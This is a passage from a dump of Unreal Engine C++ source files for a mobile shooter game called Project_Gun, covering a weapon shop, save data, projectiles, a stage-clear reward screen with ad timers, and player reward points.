PG_INVALID_INDEX);\n\t\treturn;\n\t}\n\t\n\tShowBuyPopupBox(EBuyType::eBT_Weapon, pWeaponShopData->WeaponData.Name, TEXT(\"Do you want to buy?\"), pWeaponShopData->CostUnlock);\n}\n\nvoid UPG_UserWidgetShopWeaponBox::OnRequestLevelupPower()\n{\n\tif (false == m_pGameMode.IsValid(true))\n\t{\n\t\tABLOG(Error, TEXT(\"m_pGameMode is nullptr\"));\n\t\tShowMessageBox(TEXT(\"Error\"), TEXT(\"Purchase failed.\"), PG_INVALID_INDEX);\n\t\treturn;\n\t}\n\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance);\n\n\tconst FPGWeaponTableData* pWeaponShopData = pGameInstance->GetWeaponTableData(WeaponIndex);\n\tif (nullptr == pWeaponShopData)\n\t{\n\t\tABLOG(Error, TEXT(\"GetWeaponTableData is Null (WeaponIndex : %d)\"), WeaponIndex);\n\t\tSetEnable(false);\n\t\tShowMessageBox(TEXT(\"Error\"), TEXT(\"Purchase failed.\"), PG_INVALID_INDEX);\n\t\treturn;\n\t}\n\n\tShowBuyPopupBox(EBuyType::eBT_Power, FString::Printf(TEXT(\"%s Power\"), *pWeaponShopData->WeaponData.Name), TEXT(\"Do you want to buy?\"), pWeaponShopData->CostUpgradePower);\n}\n\nvoid UPG_UserWidgetShopWeaponBox::OnRequestLevelupAmmo()\n{\n\tABCHECK(nullptr != m_pUserWidgetBuyPopup);\n\n\tif (false == m_pGameMode.IsValid(true))\n\t{\n\t\tABLOG(Error, TEXT(\"m_pGameMode is nullptr\"));\n\t\tShowMessageBox(TEXT(\"Error\"), TEXT(\"Purchase failed.\"), PG_INVALID_INDEX);\n\t\treturn;\n\t}\n\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance);\n\n\tconst FPGWeaponTableData* pWeaponShopData = pGameInstance->GetWeaponTableData(WeaponIndex);\n\tif (nullptr == pWeaponShopData)\n\t{\n\t\tABLOG(Error, TEXT(\"GetWeaponTableData is Null (WeaponIndex : %d)\"), WeaponIndex);\n\t\tSetEnable(false);\n\t\tShowMessageBox(TEXT(\"Error\"), TEXT(\"Purchase failed.\"), PG_INVALID_INDEX);\n\t\treturn;\n\t}\n\n\tShowBuyPopupBox(EBuyType::eBT_Ammo, FString::Printf(TEXT(\"%s Ammo\"), *pWeaponShopData->WeaponData.Name), TEXT(\"Do you want to buy?\"), pWeaponShopData->CostUpgradeAmmo);\n}" }, { "alpha_fraction": 0.7454931139945984, "alphanum_fraction": 0.7529162168502808, "avg_line_length": 21.452381134033203, "blob_id": "e0b478d627b7f183b27656e070b021181bb8ebf1", "content_id": "e0f1b67a6089c025d7c45ed14f5c65e6f5d43878", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 967, "license_type": "no_license", "max_line_length": 79, "num_lines": 42, "path": "/Source/Project_Gun/Public/SaveData/PG_SaveStageData.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n\n#include <GameFramework/SaveGame.h>\n#include \"PG_SaveStageData.generated.h\"\n\n/**\n * \n */\nUCLASS()\nclass PROJECT_GUN_API UPG_SaveStageData : public USaveGame\n{\n\tGENERATED_BODY()\n\t\npublic :\n\tUPG_SaveStageData();\n\n\tUPROPERTY(VisibleAnyWhere, Category = \"PG StageSaveData\")\n\tint32 m_nStageID = 0;\n\n\t// 목표로 설정된 몬스터 제거\n\tUPROPERTY(VisibleAnyWhere, Category = \"PG StageSaveData\")\n\tstruct FPGStagePlayData m_kStagePlayData;\n\n\tUPROPERTY(VisibleAnyWhere, Category = \"PG StageSaveData\")\n\tbool m_bWasClearAmount = false;\n\n\tUPROPERTY(VisibleAnyWhere, Category = \"PG StageSaveData\")\n\tbool m_bWasClearTime = false;\n\n\tUPROPERTY(VisibleAnyWhere, Category = \"PG StageSaveData\")\n\tbool m_bWasClearLethal = false;\n\npublic :\n\tUFUNCTION()\n\tstatic FString GetSlotName(int32 a_nStageID);\n\tUFUNCTION()\n\tstatic int32 GetPlayerIndex();\n};\n" }, { "alpha_fraction": 0.7579666376113892, "alphanum_fraction": 0.7606221437454224, "avg_line_length": 22.33628273010254, "blob_id": "0a29e6c4141416ce3b16c7519546038e7eba8cce", "content_id": "5db5596739e525ad8e751a21b13cad43e93d6a94", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2654, "license_type": "no_license", "max_line_length": 115, "num_lines": 113, "path": "/Source/Project_Gun/Private/BlueScriptObject/Weapon/PG_Weapon.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#include \"BlueScriptObject/Weapon/PG_Weapon.h\"\n#include \"BlueScriptObject/Projectile/PG_Projectile.h\"\n#include \"Character/PG_MonChar.h\"\n#include \"Character/PG_MyChar.h\"\n#include \"Game/GameInstance/PG_GameInstance.h\"\n#include \"Game/GameMode/PG_GameModeBase.h\"\n\n// Sets default values\nAPG_Weapon::APG_Weapon()\n{\n \t// Set this actor to call Tick() every frame. You can turn this off to improve performance if you don't need it.\n\tPrimaryActorTick.bCanEverTick = false;\n\n\t// 캐릭터에 무기 부착\n\tWeapon = CreateDefaultSubobject<UStaticMeshComponent>(TEXT(\"WEAPON\"));\n\tFiringEffect = CreateDefaultSubobject<UParticleSystemComponent>(TEXT(\"FIRINGEFFECT\"));\n\tFiringEffect->bAutoActivate = false;\n\tFireSound = CreateDefaultSubobject<UAudioComponent>(TEXT(\"FIRESOUND\"));\n\tFireSound->bAutoActivate = false;\n\n\tRootComponent = Weapon;\n\tWeaponTableIndex = PG_INVALID_INDEX;\n}\n\n// Called when the game starts or when spawned\nvoid APG_Weapon::BeginPlay()\n{\n\tSuper::BeginPlay();\n}\n\nvoid APG_Weapon::PostInitializeComponents()\n{\n\tSuper::PostInitializeComponents();\n}\n\nvoid APG_Weapon::OnConstruction(const FTransform& Transform)\n{\n\tSuper::OnConstruction(Transform);\n}\n\nvoid APG_Weapon::Destroyed()\n{\n\tSuper::Destroyed();\n}\n\n// Called every frame\nvoid APG_Weapon::Tick(float DeltaTime)\n{\n\tSuper::Tick(DeltaTime);\n}\nbool APG_Weapon::SetWeaponData(int32 nWeaponTableIndex)\n{\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance, false);\n\n\tauto pWeaponTableData = pGameInstance->GetWeaponTableData(nWeaponTableIndex);\n\tABCHECK(nullptr != pWeaponTableData, false);\n\n\tWeaponTableIndex = nWeaponTableIndex;\n\tWeaponData = pWeaponTableData->WeaponData;\n\tMontageFireReaction = pWeaponTableData->MontageFireReaction;\n\n\treturn true;\n}\n\nint32 APG_Weapon::GetAttackRange()\n{\n\treturn WeaponData.AttackRange;\n}\n\nUAnimMontage* APG_Weapon::GetMontageFireReaction()\n{\n\treturn MontageFireReaction;\n}\n\n//void APG_Weapon::SetWeaponData(const FPGWeaponData* pWeaponData)\n//{\n//\tWeaponData = *pWeaponData;\n//}\n\nconst FPGWeaponData* APG_Weapon::GetWeaponData()\n{\n\treturn &WeaponData;\n}\n\nint32 APG_Weapon::GetWeaponAttackDamage()\n{\n\tauto pGameInstance = Cast<APG_GameModeBase>(GetWorld()->GetAuthGameMode());\n\tABCHECK(nullptr != pGameInstance, 0);\n\n\treturn pGameInstance->GetMaxPower(WeaponTableIndex);\n}\n\nbool APG_Weapon::IsOwnerMonster()\n{\n\treturn (nullptr != Cast<APG_MonChar>(GetOwner()));\n}\n\nbool APG_Weapon::IsOwnerMyPlayer()\n{\n\treturn (nullptr != Cast<APG_MyChar>(GetOwner()));\n}\n\nvoid APG_Weapon::Fire()\n{\n}\n\nvoid APG_Weapon::StopFire()\n{\n\n}" }, { "alpha_fraction": 0.7950760126113892, "alphanum_fraction": 0.7979725003242493, "avg_line_length": 31.11627960205078, "blob_id": "e3a514680da9528791ec27382735deddb6c49e9b", "content_id": "f8f164b7288335f04ec0f11e5c9a0f7aea5fefca", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1407, "license_type": "no_license", "max_line_length": 202, "num_lines": 43, "path": "/Source/Project_Gun/Public/BlueScriptObject/Projectile/PG_ProjectileShutgun.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n#include \"BlueScriptObject/Projectile/PG_Projectile.h\"\n\n#include \"PG_ProjectileShutgun.generated.h\"\n\n/**\n * \n */\nUCLASS()\nclass PROJECT_GUN_API APG_ProjectileShutgun : public APG_Projectile\n{\n\tGENERATED_BODY()\n\npublic:\n\tAPG_ProjectileShutgun();\n\nprotected:\n\tvirtual void PostInitializeComponents() override;\n\tvirtual void BeginPlay() override;\t// Called when the game starts or when spawned\n\tvirtual void Tick(float DeltaTime) override;\t// Called every frame\n\t\npublic:\n\tvirtual void FireInDirection(const struct FPGWeaponData* pWeaponData, const FVector& ShootDirection, bool bMonsterWeapon = false) override;\n\n\tvoid SetScaleTime(float fScaleTime);\n\nprivate:\n\tvoid UpdateCollisionScale(float DeltaTime);\n\nprotected:\n\tvirtual void OnTargetBeginOverlap(UPrimitiveComponent* OverlappedComp, AActor* OtherActor, UPrimitiveComponent* OtherComp, int32 OtherBodyIndex, bool bFromWeep, const FHitResult& SweepResult) override;\n\tvirtual void OnPlayEndParticle(UParticleSystemComponent* ParticleSystemComponent) override;\n\nprivate:\n\tUPROPERTY(VisibleAnywhere, BlueprintReadWrite, Category = \"PG ProjectileData\", Meta = (AllowPrivateAccess = true))\n\tUStaticMeshComponent*\tCollisionMeshComponent;\t// 샷건 발사시 충돌 체크를 위한 Static Mesh\n\n\tfloat m_fScaleTime = 0.0f;\n};\n" }, { "alpha_fraction": 0.7605177760124207, "alphanum_fraction": 0.7631068229675293, "avg_line_length": 23.15625, "blob_id": "686b4131a6d4631d45d2c96d7b3cab36ad670099", "content_id": "92e476559141997f45b9b21f6f1d8cabbcbdeafd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1547, "license_type": "no_license", "max_line_length": 79, "num_lines": 64, "path": "/Source/Project_Gun/Private/UI/PG_UserWidgetBuyPopup.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#include \"UI/PG_UserWidgetBuyPopup.h\"\n\n#include <Components/Button.h>\n#include <Components/TextBlock.h>\n\nvoid UPG_UserWidgetBuyPopup::NativeConstruct()\n{\n\tSuper::NativeConstruct();\n\n\tABCHECK(nullptr != Text_TitleName);\n\tABCHECK(nullptr != Text_Description);\n\tABCHECK(nullptr != Text_Price);\n\tABCHECK(nullptr != Btn_OK);\n\tABCHECK(nullptr != Btn_Cancel);\n\n\tBtn_OK->OnClicked.AddDynamic(this, &UPG_UserWidgetBuyPopup::OnBtnOK);\n\tBtn_Cancel->OnClicked.AddDynamic(this, &UPG_UserWidgetBuyPopup::OnBtnCancel);\n}\n\nvoid UPG_UserWidgetBuyPopup::SetVisibility(ESlateVisibility InVisibility)\n{\n\tSuper::SetVisibility(InVisibility);\n\n\tif (ESlateVisibility::Hidden != InVisibility)\n\t{\n\t\tif (PopupPlaySound)\n\t\t\tPlaySound(PopupPlaySound);\n\t}\n}\n\nvoid UPG_UserWidgetBuyPopup::SetTitle(FString kTitle)\n{\n\tABCHECK(nullptr != Text_TitleName);\n\tText_TitleName->SetText(FText::FromString(kTitle));\n}\n\nvoid UPG_UserWidgetBuyPopup::SetPrice(int32 nPrice)\n{\n\tABCHECK(nullptr != Text_Price);\n\tText_Price->SetText(FText::FromString(FString::Printf(TEXT(\"%d\"), nPrice)));\n}\n\nvoid UPG_UserWidgetBuyPopup::SetDescription(FString kDescription)\n{\n\tABCHECK(nullptr != Text_Description);\n\tText_Description->SetText(FText::FromString(kDescription));\n}\n\nvoid UPG_UserWidgetBuyPopup::SetValue(int32 nValue)\n{\n\tm_nValue = nValue;\n}\n\nvoid UPG_UserWidgetBuyPopup::OnBtnOK()\n{\n\tOnBtnClickedOK.Broadcast(m_nValue);\n}\n\nvoid UPG_UserWidgetBuyPopup::OnBtnCancel()\n{\n\tOnOnBtnClickedCancel.Broadcast(m_nValue);\n}" }, { "alpha_fraction": 0.7691331505775452, "alphanum_fraction": 0.7796759009361267, "avg_line_length": 31.62738800048828, "blob_id": "81ca42766f5959855e3089531fb95855f4d37a68", "content_id": "fd40ff77a92d810bb042ed9de9459a922cd6e6b6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 10346, "license_type": "no_license", "max_line_length": 102, "num_lines": 314, "path": "/Source/Project_Gun/Private/UI/PG_UserWidgetStageClear.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#include \"UI/PG_UserWidgetStageClear.h\"\n#include \"Game/GameMode/PG_GameModeStage.h\"\n#include \"Game/GameInstance/PG_GameInstance.h\"\n#include \"Game/GameState/PG_GameStateStage.h\"\n#include \"Player/PlayerState/PG_MyPlayerState.h\"\n\n#include <Components/Overlay.h>\n#include <Components/TextBlock.h>\n#include <Components/Button.h>\n\nvoid UPG_UserWidgetStageClear::NativeConstruct()\n{\n\tSuper::NativeConstruct();\n\tOverlay_ActiveFlag = Cast<UOverlay>(GetWidgetFromName(TEXT(\"Overlay_ActiveFlag\")));\n\tABCHECK(nullptr != Overlay_ActiveFlag);\n\tOverlay_DeActiveFlag = Cast<UOverlay>(GetWidgetFromName(TEXT(\"Overlay_DeActiveFlag\")));\n\tABCHECK(nullptr != Overlay_DeActiveFlag);\n\tOverlay_ActiveTime = Cast<UOverlay>(GetWidgetFromName(TEXT(\"Overlay_ActiveTime\")));\n\tABCHECK(nullptr != Overlay_ActiveTime);\n\tOverlay_DeActiveTime = Cast<UOverlay>(GetWidgetFromName(TEXT(\"Overlay_DeActiveTime\")));\n\tABCHECK(nullptr != Overlay_DeActiveTime);\n\tOverlay_ActiveLethal = Cast<UOverlay>(GetWidgetFromName(TEXT(\"Overlay_ActiveLethal\")));\n\tABCHECK(nullptr != Overlay_ActiveLethal);\n\tOverlay_DeActiveLethal = Cast<UOverlay>(GetWidgetFromName(TEXT(\"Overlay_DeActiveLethal\")));\n\tABCHECK(nullptr != Overlay_DeActiveLethal);\n\n\tm_pBtn_ViewAD = Cast<UButton>(GetWidgetFromName(TEXT(\"Btn_ViewAD\")));\n\tABCHECK(nullptr != m_pBtn_ViewAD);\n\n\tABCHECK(nullptr != Text_BonusFlag);\n\tABCHECK(nullptr != Text_BonusLethal);\n\tABCHECK(nullptr != Text_BonusTime);\n\tABCHECK(nullptr != Text_BonusStageClear);\n\tABCHECK(nullptr != Text_BonusKill);\n\tABCHECK(nullptr != Text_BonusStar);\n\tABCHECK(nullptr != Text_CaptionBonusAD);\n\tABCHECK(nullptr != Text_BonusAD);\n\tABCHECK(nullptr != Text_ClearADTimer);\n\tABCHECK(nullptr != Text_TotalReward);\n\n\tauto pGameStateStage = Cast<APG_GameStateStage>(GetWorld()->GetGameState());\n\tABCHECK(nullptr != pGameStateStage);\n\tpGameStateStage->OnViewAD.AddUObject(this, &UPG_UserWidgetStageClear::OnViewResultAD);\n}\n\nvoid UPG_UserWidgetStageClear::NativeTick(const FGeometry& MyGeometry, float DeltaTime)\n{\n\tSuper::NativeTick(MyGeometry, DeltaTime);\n\t\n\tif (false == m_bWasViewStageClear3X)\n\t{\n\t\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\t\tABCHECK(nullptr != pGameInstance);\n\n\t\tint32 nRemainTime = pGameInstance->GetADRemainTime(EADType::eAT_StageClear3X);\n\t\tSetBtnBonusADTime(nRemainTime);\n\t\tSetBtnEnableAD((nRemainTime <= 0));\n\t}\n}\n\nbool UPG_UserWidgetStageClear::IsAbleViewStagePlayAD()\n{\n\tif (m_bWasViewStageClear3X)\n\t{\n\t\t// 스테이지 클리어 후 보상형 광고를 보았으면 스테이지 플레이 광고를 볼 수 없다.\n\t\treturn false;\n\t}\n\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance, false);\n\n\treturn pGameInstance->IsAbleADView(EADType::eAT_StagePlayAD);\n}\n\nvoid UPG_UserWidgetStageClear::OnBtnRetry()\n{\n\tauto pGameModeStage = Cast<APG_GameModeStage>(GetWorld()->GetAuthGameMode());\n\tABCHECK(nullptr != pGameModeStage);\n\n\tpGameModeStage->SavePlayerData();\n\tpGameModeStage->SaveStageData();\n\tpGameModeStage->StartGame_NextStage();\n}\n\nvoid UPG_UserWidgetStageClear::OnBtnGoToMainLobby()\n{\n\tauto pGameModeStage = Cast<APG_GameModeStage>(GetWorld()->GetAuthGameMode());\n\tABCHECK(nullptr != pGameModeStage);\n\n\tpGameModeStage->SavePlayerData();\n\tpGameModeStage->SaveStageData();\n\n\tUGameplayStatics::OpenLevel(GetWorld(), TEXT(\"/Game/PG/Maps/Lobby/MainLobby\"));\n}\n\nvoid UPG_UserWidgetStageClear::OnBtnNextStage()\n{\n\tauto pGameModeStage = Cast<APG_GameModeStage>(GetWorld()->GetAuthGameMode());\n\tABCHECK(nullptr != pGameModeStage);\n\n\tpGameModeStage->SavePlayerData();\n\tpGameModeStage->SaveStageData();\n\tpGameModeStage->StartGame_NextStage();\n}\n\nvoid UPG_UserWidgetStageClear::OnBtnViewAD()\n{\n\n}\n\nvoid UPG_UserWidgetStageClear::OnADRewardVideoSucessed()\n{\n\tm_bWasViewStageClear3X = true;\n\n\tauto pGameStateStage = Cast<APG_GameStateStage>(GetWorld()->GetGameState());\n\tABCHECK(nullptr != pGameStateStage);\n\n\t// 보상 적용\n\tpGameStateStage->RequestViewAD();\n\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance);\n\n\t// 타이머 리셋\n\tpGameInstance->ResetADRemainTime(EADType::eAT_StageClear3X);\n\n\tSetBtnEnableAD(false);\n}\n\nvoid UPG_UserWidgetStageClear::OnADRewardVideoClosed()\n{\n\n}\n\nvoid UPG_UserWidgetStageClear::OnADPlayStageVideoSucessed()\n{\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance);\n\n\tpGameInstance->ResetADRemainTime(EADType::eAT_StagePlayAD);\n}\n\nvoid UPG_UserWidgetStageClear::OnADPlayStageVideoClosed()\n{\n\n}\n\nvoid UPG_UserWidgetStageClear::OnViewResultAD(bool bEnable)\n{\n\tUpdateClearStageLayout();\n}\n\nvoid UPG_UserWidgetStageClear::UpdateClearStageLayout()\n{\n\tauto pGameModeStage = Cast<APG_GameModeStage>(GetWorld()->GetAuthGameMode());\n\tABCHECK(nullptr != pGameModeStage);\n\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance);\n\n\tauto pTableStageData = pGameInstance->GetTableStageData(pGameModeStage->GetPlayStageID());\n\tABCHECK(nullptr != pTableStageData);\n\n\t// 몬스터 킬\n\tbool bIsClearAmount = pGameModeStage->IsClearMission(EStageClearType::eSCT_AmountKill);\n\tbool bIsWasClearAmount = pGameModeStage->IsWasClearMisiion(EStageClearType::eSCT_AmountKill);\n\tif (bIsClearAmount || bIsWasClearAmount)\n\t{\n\t\tOverlay_ActiveFlag->SetVisibility(ESlateVisibility::HitTestInvisible);\n\t\tOverlay_DeActiveFlag->SetVisibility(ESlateVisibility::Hidden);\n\n\t\tSetBonusFlag(bIsWasClearAmount, pTableStageData->StarReward);\n\t}\n\telse\n\t{\n\t\tOverlay_ActiveFlag->SetVisibility(ESlateVisibility::Hidden);\n\t\tOverlay_DeActiveFlag->SetVisibility(ESlateVisibility::HitTestInvisible);\n\t}\n\n\t// 필살기\n\tbool bIsClearLethal = pGameModeStage->IsClearMission(EStageClearType::eSCT_Lethal);\n\tbool bIsWasClearLethal = pGameModeStage->IsWasClearMisiion(EStageClearType::eSCT_Lethal);\n\tif (bIsClearLethal || bIsWasClearLethal)\n\t{\n\t\tOverlay_ActiveLethal->SetVisibility(ESlateVisibility::HitTestInvisible);\n\t\tOverlay_DeActiveLethal->SetVisibility(ESlateVisibility::Hidden);\n\t\tSetBonusLethal(bIsWasClearLethal, pTableStageData->StarReward);\n\t}\n\telse\n\t{\n\t\tOverlay_ActiveLethal->SetVisibility(ESlateVisibility::Hidden);\n\t\tOverlay_DeActiveLethal->SetVisibility(ESlateVisibility::HitTestInvisible);\n\t}\n\t\n\t// 시간 \n\tbool bIsClearTime = pGameModeStage->IsClearMission(EStageClearType::eSCT_ClearTime);\n\tbool bIsWasClearTime = pGameModeStage->IsWasClearMisiion(EStageClearType::eSCT_ClearTime);\n\tif (bIsClearTime || bIsWasClearTime)\n\t{\n\t\tOverlay_ActiveTime->SetVisibility(ESlateVisibility::HitTestInvisible);\n\t\tOverlay_DeActiveTime->SetVisibility(ESlateVisibility::Hidden);\n\t\tSetBonusTime(bIsWasClearTime, pTableStageData->StarReward);\n\t}\n\telse\n\t{\n\t\tOverlay_ActiveTime->SetVisibility(ESlateVisibility::Hidden);\n\t\tOverlay_DeActiveTime->SetVisibility(ESlateVisibility::HitTestInvisible);\n\t}\n\n\tauto pGameStateStage = Cast<APG_GameStateStage>(GetWorld()->GetGameState());\n\tABCHECK(nullptr != pGameStateStage);\n\t\n\tSetBonusStageClear(pGameStateStage->GetClearStagePoint());\n\tSetBonusMonsterKill(pGameStateStage->GetClearMonsterKillPoint());\n\tSetBonusStar(pGameStateStage->GetClearMissionPoint());\n\tSetBonusAD(pGameStateStage->IsViewAD());\n\tSetTotalReward(pGameStateStage->GetClearTotalPoint());\n}\n\nvoid UPG_UserWidgetStageClear::SetBonusStageClear(int32 nStageClearBonus)\n{\n\tABCHECK(nullptr != Text_BonusStageClear);\n\tText_BonusStageClear->SetText(FText::FromString(FString::Printf(TEXT(\"+%d\"), nStageClearBonus)));\n}\n\nvoid UPG_UserWidgetStageClear::SetBonusMonsterKill(int32 nMonsterKillBonus)\n{\n\tABCHECK(nullptr != Text_BonusKill);\n\tText_BonusKill->SetText(FText::FromString(FString::Printf(TEXT(\"+%d\"), nMonsterKillBonus)));\n}\n\nvoid UPG_UserWidgetStageClear::SetBonusStar(int32 nStarBonus)\n{\n\tABCHECK(nullptr != Text_BonusStar);\n\tText_BonusStar->SetText(FText::FromString(FString::Printf(TEXT(\"+%d\"), nStarBonus)));\n}\n\nvoid UPG_UserWidgetStageClear::SetBonusAD(bool bEnable)\n{\n\tABCHECK(nullptr != Text_CaptionBonusAD);\n\tABCHECK(nullptr != Text_BonusAD);\n\n\tif (bEnable)\n\t{\n\t\tText_CaptionBonusAD->SetColorAndOpacity(FSlateColor(FLinearColor(0.000000f, 0.270706f, 1.000000f)));\n\t\tText_BonusAD->SetColorAndOpacity(FSlateColor(FLinearColor(0.000000f, 0.270706f, 1.000000f)));\n\t}\n\telse\n\t{\n\t\tText_CaptionBonusAD->SetColorAndOpacity(FSlateColor(FLinearColor(0.157986f, 0.157986f, 0.157986f)));\n\t\tText_BonusAD->SetColorAndOpacity(FSlateColor(FLinearColor(0.157986f, 0.157986f, 0.157986f)));\n\t}\n}\n\nvoid UPG_UserWidgetStageClear::SetBtnBonusADTime(int32 nTime)\n{\n\tABCHECK(nullptr != Text_ClearADTimer);\n\tText_ClearADTimer->SetText(FText::FromString(FString::Printf(TEXT(\"%d\"), nTime)));\n}\n\nvoid UPG_UserWidgetStageClear::SetBtnEnableAD(bool bEnable)\n{\n\tABCHECK(nullptr != m_pBtn_ViewAD);\n\n\tif (m_pBtn_ViewAD->bIsEnabled != bEnable)\n\t\tm_pBtn_ViewAD->SetIsEnabled(bEnable);\n\n\tABCHECK(nullptr != Text_ClearADTimer);\n\tif (bEnable)\n\t\tText_ClearADTimer->SetVisibility(ESlateVisibility::Hidden);\n\telse\n\t\tText_ClearADTimer->SetVisibility(ESlateVisibility::HitTestInvisible);\n}\n\nvoid UPG_UserWidgetStageClear::SetTotalReward(int32 nTotalReward)\n{\n\tABCHECK(nullptr != Text_TotalReward);\n\tText_TotalReward->SetText(FText::FromString(FString::Printf(TEXT(\"%d\"), nTotalReward)));\n}\n\nvoid UPG_UserWidgetStageClear::SetBonusFlag(bool bWasClear, int32 nBonus)\n{\n\tABCHECK(nullptr != Text_BonusFlag);\n\tText_BonusFlag->SetText(FText::FromString(FString::Printf(TEXT(\"+%d\"), nBonus)));\n\n\tif (bWasClear)\n\t\tText_BonusFlag->SetVisibility(ESlateVisibility::Hidden);\n\telse\n\t\tText_BonusFlag->SetVisibility(ESlateVisibility::HitTestInvisible);\n}\n\nvoid UPG_UserWidgetStageClear::SetBonusLethal(bool bWasClear, int32 nBonus)\n{\n\tABCHECK(nullptr != Text_BonusLethal);\n\tText_BonusLethal->SetText(FText::FromString(FString::Printf(TEXT(\"+%d\"), nBonus)));\n\n\tif (bWasClear)\n\t\tText_BonusLethal->SetVisibility(ESlateVisibility::Hidden);\n\telse\n\t\tText_BonusLethal->SetVisibility(ESlateVisibility::HitTestInvisible);\n}\n\nvoid UPG_UserWidgetStageClear::SetBonusTime(bool bWasClear, int32 nBonus)\n{\n\tABCHECK(nullptr != Text_BonusTime);\n\tText_BonusTime->SetText(FText::FromString(FString::Printf(TEXT(\"+%d\"), nBonus)));\n\n\tif (bWasClear)\n\t\tText_BonusTime->SetVisibility(ESlateVisibility::Hidden);\n\telse\n\t\tText_BonusTime->SetVisibility(ESlateVisibility::HitTestInvisible);\n}" }, { "alpha_fraction": 0.7568368315696716, "alphanum_fraction": 0.7723336219787598, "avg_line_length": 29.685314178466797, "blob_id": "0cac92c9fd4793230952e8b81f85c0aaf78deec0", "content_id": "4ea786ebc4304635f8dfc0a3e2b5d138b545138e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4446, "license_type": "no_license", "max_line_length": 133, "num_lines": 143, "path": "/Source/Project_Gun/Private/Player/PlayerState/PG_MyPlayerState.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#include \"Player/PlayerState/PG_MyPlayerState.h\"\n#include \"Game/GameInstance/PG_GameInstance.h\"\n#include \"Game/GameMode/PG_GameModeBase.h\"\n#include \"Game/GameMode/PG_GameModeStage.h\"\n#include \"SaveData/PG_SavePlayerData.h\"\n#include \"Character/PG_MyChar.h\"\n#include \"Character/PG_MonChar.h\"\n#include \"BlueScriptObject/Weapon/PG_Weapon.h\"\n#include \"BlueScriptObject/LethalAttack/PG_LethalAttack.h\"\n\nAPG_MyPlayerState::APG_MyPlayerState()\n{\n}\n\nvoid APG_MyPlayerState::PostInitializeComponents()\n{\n\tSuper::PostInitializeComponents();\n\tABCHECK(InitPlayerData());\n}\n\nvoid APG_MyPlayerState::BeginPlay()\n{\n\tSuper::BeginPlay();\n}\n\nbool APG_MyPlayerState::InitPlayerData()\n{\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance, false);\n\n\tauto pGameMode = Cast<APG_GameModeBase>(GetWorld()->GetAuthGameMode());\n\tABCHECK(nullptr != pGameMode, false);\n\n\tauto pPlayerSaveData = pGameMode->GetSavePlayerData();\n\tABCHECK(nullptr != pPlayerSaveData, false);\n\n\tm_kOrignalPlayerData.RewardPoint = pPlayerSaveData->m_nRewardPoint;\n\tm_kOrignalPlayerData.EquipWeaponInventoryIndex = 0;// pPlayerSaveData->m_nEquipWeaponSlotIndex;\n\tm_kOrignalPlayerData.PlayerWeaponInventory = pPlayerSaveData->m_kEquipWeaponTableIndex;\n\tm_kOrignalPlayerData.bExtendWeaponSlot = pPlayerSaveData->m_bExtendWeaponSlot;\n\n\tfor (int32 nIndex = 0; nIndex < PG_MAX_WEAPON_SLOT; ++nIndex)\n\t{\n\t\tm_kOrignalPlayerData.PlayerWeaponAmmo[nIndex] = pGameMode->GetMaxAmmo(pPlayerSaveData->m_kEquipWeaponTableIndex[nIndex]);\n\t}\n\n\tm_kPlayingPlayerData = m_kOrignalPlayerData;\n\n\treturn true;\n}\n\nvoid APG_MyPlayerState::MonsterKill(APG_MonChar* KillMon)\n{\n\tABCHECK(nullptr != KillMon);\n\tint32 nRandIndex = FMath::RandRange(0, 100);\n\tint32 nDropRate = (int32)(KillMon->GetDropRate() * 100.0f);\n\tif (nRandIndex <= nDropRate)\n\t{\n\t\tfloat fDropRate = KillMon->GetDropRate();\n\t\tint32 GetRewardPoint = (fDropRate < 1.0f) ? 1 : (int32)fDropRate;\n\t\tAddRewardPoint(GetRewardPoint);\n\t\tOnKillAddRewardPoint.Broadcast(GetRewardPoint);\n\t\tABLOG(Warning, TEXT(\"Get Reward Point : %d\"), GetRewardPoint);\n\t}\n\t\n\tOnDefaultAttackMonsterKill.Broadcast(KillMon);\n}\n\nvoid APG_MyPlayerState::MonsterLethalAttackKill(APG_MonChar* KillMon)\n{\n\tABCHECK(nullptr != KillMon);\n\tint32 nRandIndex = FMath::RandRange(0, 100);\n\tint32 nDropRate = (int32)(KillMon->GetDropRate() * 